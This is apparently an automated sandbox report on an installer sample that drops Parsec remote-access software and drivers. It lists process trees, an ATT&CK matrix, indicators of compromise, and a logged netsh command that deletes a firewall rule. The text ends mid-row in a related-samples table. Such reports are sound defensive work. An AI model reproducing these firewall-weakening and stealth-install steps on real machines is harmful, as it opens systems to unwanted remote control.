Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exeCode function: 49_2_00007FF763C53860 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,49_2_00007FF763C53860
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exeCode function: 5_2_0046DEA0 GetVersion,GetModuleHandleW,GetProcAddress,5_2_0046DEA0
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies the windows firewall
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall delete rule name=Parsec
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting		1
Valid Accounts		11
Windows Management Instrumentation		12
Scripting		1
LSASS Driver		21
Disable or Modify Tools		11
Input Capture		12
System Time Discovery		Remote Services1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
LSASS Driver		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol11
Input Capture		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		1
DLL Side-Loading		1
Valid Accounts		3
Obfuscated Files or Information		Security Account Manager47
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job		1
Valid Accounts		11
Access Token Manipulation		1
Software Packing		NTDS2
Query Registry		Distributed Component Object ModelInput Capture14
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts13
Service Execution		35
Windows Service		35
Windows Service		1
Timestomp		LSA Secrets31
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Scheduled Task/Job		12
Process Injection		1
DLL Side-Loading		Cached Domain Credentials1
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd Timers111
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		1
File Deletion		DCSync2
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job111
Registry Run Keys / Startup Folder		133
Masquerading		Proc Filesystem2
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Valid Accounts		/etc/passwd and /etc/shadow1
System Network Configuration Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Virtualization/Sandbox Evasion		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Access Token Manipulation		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task12
Process Injection		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555525 Sample: uu8v4UUzTU.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 42 184 beautifullyuncluttered.com 2->184 186 ifconfig.me 2->186 188 3 other IPs or domains 2->188 194 Suricata IDS alerts for network traffic 2->194 196 Sigma detected: Rare Remote Thread Creation By Uncommon Source Image 2->196 15 uu8v4UUzTU.exe 2 2->15         started        18 svchost.exe 2->18         started        20 pservice.exe 2->20         started        signatures3 process4 file5 182 C:\Users\user\AppData\...\uu8v4UUzTU.tmp, PE32 15->182 dropped 23 uu8v4UUzTU.tmp 23 64 15->23         started        27 drvinst.exe 18->27         started        30 drvinst.exe 18->30         started        32 drvinst.exe 18->32         started        34 2 other processes 18->34 200 Creates files in the system32 config directory 20->200 signatures6 process7 dnsIp8 190 beautifullyuncluttered.com 188.114.97.3, 443, 49734 CLOUDFLARENETUS European Union 23->190 192 ifconfig.me 34.160.111.145, 443, 49733 ATGS-MMD-ASUS United States 23->192 144 C:\Users\user\AppData\...\xwreg.dll (copy), PE32 23->144 dropped 146 C:\Users\user\...\xpsservices.dll (copy), PE32 23->146 dropped 148 C:\Users\user\AppData\...\wups.dll (copy), PE32 23->148 dropped 158 94 other files (none is malicious) 23->158 dropped 36 cmd.exe 1 23->36         started        38 cmd.exe 1 23->38         started        40 cmd.exe 1 23->40         started        42 cmd.exe 1 23->42         started        204 Tries to open files direct via NTFS file id 27->204 150 C:\Windows\...\parsecvusba.sys (copy), PE32+ 30->150 dropped 152 C:\Windows\System32\...\SETDEC5.tmp, PE32+ 30->152 dropped 154 C:\Windows\...\parsecvirtualds.sys (copy), PE32+ 32->154 dropped 156 C:\Windows\System32\...\SETE85A.tmp, PE32+ 32->156 dropped file9 signatures10 process11 process12 44 parsec-windows.exe 19 48 36->44         started        47 conhost.exe 36->47         started        49 7z.exe 3 38->49         started        51 conhost.exe 38->51         started        53 conhost.exe 40->53         started        55 conhost.exe 42->55         started        file13 172 C:\Program Files\Parsec\vusb\parsec-vud.exe, PE32 44->172 dropped 174 C:\Program Files\Parsec\pservice.exe, PE32+ 44->174 dropped 176 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 44->176 dropped 180 8 other files (none is malicious) 44->180 dropped 57 cmd.exe 44->57         started        59 wscript.exe 1 44->59         started        62 cmd.exe 44->62         started        64 5 other processes 44->64 178 C:\Users\user\AppData\...\parsec-windows.exe, PE32 49->178 dropped process14 signatures15 66 parsec-vud.exe 57->66         started        70 conhost.exe 57->70         started        206 Uses schtasks.exe or at.exe to add and modify task schedules 59->206 208 Uses netsh to modify the Windows network and firewall settings 59->208 210 Windows Scripting host queries suspicious COM object (likely to drop second stage) 59->210 212 Modifies the windows firewall 59->212 72 taskkill.exe 1 59->72         started        74 sc.exe 1 59->74         started        76 parsec-vdd.exe 62->76         started        78 conhost.exe 62->78         started        80 sc.exe 1 64->80         started        82 sc.exe 64->82         started        84 7 other processes 64->84 process16 file17 128 C:\Program Files\...\parsecvusba.sys, PE32+ 66->128 dropped 130 C:\Program Files\...\parsecvirtualds.sys, PE32+ 66->130 dropped 132 C:\Program Files\...\nefconw.exe, PE32+ 66->132 dropped 140 5 other files (none is malicious) 66->140 dropped 198 Sample is not signed and drops a device driver 66->198 86 cmd.exe 66->86         started        88 cmd.exe 66->88         started        90 conhost.exe 72->90         started        92 conhost.exe 74->92         started        134 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 76->134 dropped 136 C:\Users\user\AppData\Local\...\System.dll, PE32 76->136 dropped 138 C:\Program Files\...\uninstall.exe, PE32 76->138 dropped 142 2 other files (none is malicious) 76->142 dropped 94 cmd.exe 76->94         started        96 wevtutil.exe 76->96         started        98 conhost.exe 80->98         started        100 conhost.exe 82->100         started        102 7 other processes 84->102 signatures18 process19 process20 104 nefconw.exe 86->104         started        108 nefconw.exe 86->108         started        110 conhost.exe 86->110         started        112 nefconw.exe 86->112         started        114 conhost.exe 88->114         started        116 nefconc.exe 88->116         started        118 nefconw.exe 94->118         started        120 3 other processes 94->120 122 2 other processes 96->122 file21 160 C:\Users\user\...\parsecvirtualds.sys (copy), PE32+ 104->160 dropped 162 C:\Users\user\AppData\Local\...\SETE77F.tmp, PE32+ 104->162 dropped 202 Creates an autostart registry key pointing to binary in C:\Windows 104->202 124 runonce.exe 104->124         started        164 C:\Users\user\...\parsecvusba.sys (copy), PE32+ 108->164 dropped 166 C:\Users\user\AppData\Local\...\SETDCF0.tmp, PE32+ 108->166 dropped 168 C:\Users\user\AppData\Local\...\mm.dll (copy), PE32+ 118->168 dropped 170 C:\Users\user\AppData\Local\...\SETFD68.tmp, PE32+ 118->170 dropped signatures22 process23 process24 126 grpconv.exe 124->126         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
uu8v4UUzTU.exe0%ReversingLabs
uu8v4UUzTU.exe3%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files\Parsec Virtual Display Driver\driver\mm.dll0%ReversingLabs
C:\Program Files\Parsec Virtual Display Driver\nefconw.exe0%ReversingLabs
C:\Program Files\Parsec Virtual Display Driver\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys0%ReversingLabs
C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec\parsecd.exe0%ReversingLabs
C:\Program Files\Parsec\pservice.exe0%ReversingLabs
C:\Program Files\Parsec\skel\parsecd-150-93b.dll0%ReversingLabs
C:\Program Files\Parsec\teams.exe0%ReversingLabs
C:\Program Files\Parsec\uninstall.exe0%ReversingLabs
C:\Program Files\Parsec\vdd\parsec-vdd.exe0%ReversingLabs
C:\Program Files\Parsec\vusb\parsec-vud.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-4VCD0.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nscF857.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nscF857.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nstD696.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nstD696.tmp\UserInfo.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nstD696.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\ApplicationID.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsDialogs.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsvA814.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\SETDCF0.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{07ec11c3-0442-934e-b5ee-7c271dda5618}\parsecvusba.sys (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\SETE77F.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{bea99733-6925-1c45-8b38-88de72198ece}\parsecvirtualds.sys (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\SETFD68.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\{d69aa289-d543-ea4a-a8fd-892bf2d05645}\mm.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\7z.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\7z.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\IEAdvpack.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\KBDA3.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\LockAppBroker.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MCRecvSrc.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MFWMAAEC.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\MP43DECD.DLL (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\RdpSaUacHelper.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\SyncInfrastructureps.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\SystemEventsBrokerClient.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\TpmTool.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\TrustedSignalCredProv.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\UserDataAccessRes.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\VAN.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\VscMgrPS.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\WSClient.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\Windows.ApplicationModel.ConversationalAgent.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\Windows.UI.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\cryptdlg.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\dmcfgutils.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\dskquoui.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\getuname.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\gp548-win64-mingw.exe (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\icuin.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\iesysprep.dll (copy)0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-0BSQ7.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-0LBKR.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-1CLR0.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-1L3B3.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-2V0O4.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-39NTG.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-4HGOQ.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-4SSD7.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-60VI8.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-61CCU.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-61DKO.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-6DK0L.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-6EGJL.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-86N5H.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-8G60N.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-9HECR.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-BK2QC.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-BOVF1.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-BUN5H.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-CEDA5.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-DQG3S.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-G4CQT.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-G92OK.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-H42SM.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-H8DB6.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-HA8AR.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-HCV6V.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-HI4IL.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-HQ9KB.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-I39R4.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-IJKK2.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-JRFAI.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-K5NEU.tmp0%ReversingLabs
C:\Users\user\AppData\Roaming\PSecWin\is-L6U16.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
beautifullyuncluttered.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://beautifullyuncluttered.com/0%VirustotalBrowse
https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsec0%Avira URL Cloudsafe
https://parsec.appURLUpdateInfohttps://parsec.app/changelog0%Avira URL Cloudsafe
https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(i0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/L0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/0%Avira URL Cloudsafe
https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsec0%Avira URL Cloudsafe
https://beautifullyuncluttered.com/?CheckApp0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
beautifullyuncluttered.com
188.114.97.3
truetrueunknown
builds.parsec.app
104.18.0.181
truefalse
    		high
    ifconfig.me
    		34.160.111.145
    		truefalse
      		high
      fp2e7a.wpc.phicdn.net
      		192.229.221.95
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://ifconfig.me/ipfalse
          		high
          https://beautifullyuncluttered.com/?CheckApptrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUuu8v4UUzTU.exe, is-G92OK.tmp.1.drfalse
            		high
            https://parsec.appURLUpdateInfohttps://parsec.app/changelogURL:parsecparsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://ifconfig.me/Guu8v4UUzTU.tmp, 00000001.00000003.1960296249.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000003.1956522073.00000000008BB000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153836962.00000000008BE000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://crl.microsoftdrvinst.exe, 00000037.00000003.2039083129.000002B48D596000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2038432096.000002B48D588000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000003.2036630983.000002B48D59B000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000037.00000002.2039476468.000002B48D598000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://www.remobjects.com/psuu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drfalse
                  		high
                  https://ifconfig.me/ip5.1ryuu8v4UUzTU.tmp, 00000001.00000003.1960625837.0000000000854000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2153690668.0000000000854000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.unicode.org/copyright.htmluu8v4UUzTU.tmp, 00000001.00000003.1946267856.0000000005AA3000.00000004.00001000.00020000.00000000.sdmp, is-BUN5H.tmp.1.drfalse
                      		high
                      https://www.innosetup.com/uu8v4UUzTU.exe, 00000000.00000003.1717417935.000000007FB30000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.exe, 00000000.00000003.1716990180.0000000002560000.00000004.00001000.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000000.1718977411.0000000000401000.00000020.00000001.01000000.00000004.sdmp, uu8v4UUzTU.tmp.0.drfalse
                        		high
                        https://parsec.appURLUpdateInfohttps://parsec.app/changelogparsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorErrorparsec-windows.exe, 0000000C.00000000.1878859711.000000000040A000.00000008.00000001.01000000.0000000A.sdmp, parsec-windows.exe, 0000000C.00000002.2126070552.000000000040A000.00000004.00000001.01000000.0000000A.sdmp, parsec-vud.exe, 0000002E.00000002.2092202681.000000000040A000.00000004.00000001.01000000.00000011.sdmp, parsec-vud.exe, 0000002E.00000000.2008553821.000000000040A000.00000008.00000001.01000000.00000011.sdmp, parsec-vdd.exe, 00000042.00000002.2124004520.000000000040A000.00000004.00000001.01000000.00000018.sdmp, parsec-vdd.exe, 00000042.00000000.2095284861.000000000040A000.00000008.00000001.01000000.00000018.sdmp, parsec-windows.exe.5.dr, parsec-vud.exe.12.drfalse
                          		high
                          https://beautifullyuncluttered.com/Luu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://parsec.appURLUpdateInfohttps://parsec.app/changelogkernel32::Wow64EnableWow64FsRedirection(iparsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://beautifullyuncluttered.com/uu8v4UUzTU.tmp, 00000001.00000003.1869309057.0000000003A58000.00000004.00000020.00020000.00000000.sdmp, uu8v4UUzTU.tmp, 00000001.00000002.2154440531.0000000003A93000.00000004.00000020.00020000.00000000.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://support.parsec.appInstallLocationNoModifyNoRepairPublisherParsecparsec-windows.exe, 0000000C.00000002.2126538465.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-windows.exe, 0000000C.00000003.2125830286.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, parsec-vud.exe, 0000002E.00000002.2092532699.0000000000608000.00000004.00000020.00020000.00000000.sdmp, parsec-vdd.exe, 00000042.00000002.2124360355.0000000000618000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          188.114.97.3
                          		beautifullyuncluttered.comEuropean Union
                          		13335CLOUDFLARENETUStrue
                          34.160.111.145
                          		ifconfig.meUnited States
                          		2686ATGS-MMD-ASUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1555525
                          Start date and time:2024-11-14 03:10:43 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 13m 2s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:75
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:uu8v4UUzTU.exe
                          renamed because original name is a hash value
                          Original Sample Name:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9.exe
                          Detection:MAL
                          Classification:mal42.evad.winEXE@125/200@3/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 110
                          • Number of non-executed functions: 211
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 192.229.221.95
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsps.ssl.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          02:12:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1
                          02:12:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Parsec.App.0 C:\Program Files\Parsec\parsecd.exe app_silent=1

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          188.114.97.3TT copy.exeGet hashmaliciousFormBookBrowse
                          • www.lnnn.fun/u5w9/
                          QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          • filetransfer.io/data-package/iiEh1iM3/download
                          Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • paste.ee/d/dc8Ru
                          Scan12112024,pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • paste.ee/d/LOToW
                          8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                          • qegyhig.com/login.php
                          7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                          • lysyvan.com/login.php
                          34.160.111.145Creal.exeGet hashmaliciousCreal StealerBrowse
                          • ifconfig.me/
                          #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeGet hashmaliciousBlank Grabber, Creal StealerBrowse
                          • ifconfig.me/
                          SecuriteInfo.com.Variant.Fragtor.599953.20231.7803.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                          • myexternalip.com/raw
                          mek_n_bat.batGet hashmaliciousUnknownBrowse
                          • ifconfig.me/ip
                          dtyb0ut8vVGet hashmaliciousUnknownBrowse
